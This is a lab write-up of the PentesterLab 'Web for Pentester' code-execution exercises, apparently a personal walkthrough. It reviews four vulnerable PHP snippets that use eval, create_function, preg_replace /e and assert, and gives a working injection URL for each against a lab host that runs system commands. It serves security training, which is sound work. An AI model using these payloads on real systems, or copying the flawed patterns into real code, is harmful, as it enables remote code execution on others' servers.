Bob1Bob2

Web for Pentester: This exercise is a set of the most common web vulnerability

Difficluty: 1/5

Pentester lab: Code executions come from a lack of filtering and/or escaping of user-controlled data. When you are exploiting a code injection, you will need to inject code within the information you are sending to the application. For example, if you want to run the command ls, you will need to send system(“ls”) to the application since it is a PHP application.

Example 1

code review:

1
2
3
4
5

?php
  $str="echo \"Hello ".$_GET['name']."!!!\";";

  eval($str);
?>

The developer use function eval to echo the name. Hpwever, the developer doesn’t filter the input of eval function. By using concatenation ., I can add code after the input and use # to comment the rest of code

manually exploit:

http://192.168.79.162/codeexec/example1.php?name=hacker".system('uname -a');#

payload hacker".system('uname -a');# needs to be URL encoded.

Example 2

code review:

1
2
3
4
5
6
7
8
9
10

$order = $_GET["order"];
  $result = mysql_query($sql);
  if ($result) {
      while ($row = mysql_fetch_assoc($result)) {
      $users[] = new User($row['id'],$row['name'],$row['age']);
    }
    if (isset($order)) {
      usort($users, create_function('$a, $b', 'return strcmp($a->'.$order.',$b->'.$order.');'));
    }
  }

Form Pentesterlab:

The function usort is often used with the function create_function to dynamically generate the “sorting” function, based on user-controlled information. If the web application lacks potent filtering and validation, this can lead to code execution.

manually exploit:

http://192.168.79.162/codeexec/example2.php?order=id);}system('uname -a');#

Example 3

code review:

1
2
3

<?php
  echo preg_replace($_GET["pattern"], $_GET["new"], $_GET["base"]);
?>

From Pentesterlab:

We talked earlier about regular expression modifiers with multi-line regular expression. Another very dangerous modifier exists in PHP: PCRE_REPLACE_EVAL (/e). This modifier will cause the function preg_replace to evaluate the new value as PHP code, before performing the substitution.

manually exploit:

http://192.168.79.162/codeexec/example3.php?new=system('uname%20-a')&pattern=/lamer/e&base=Hello lamer

Example 4

code review:

1
2

assert(trim("'".$_GET['name']."'"));
echo "Hello ".htmlentities($_GET['name']);

from Pentesterlab:

This example is based on the function assert. When used incorrectly, this function will evaluate the value received. This behaviour can be used to gain code execution.

manual exploit:

http://192.168.79.162/codeexec/example4.php?name=hacker'.system('uname -a').'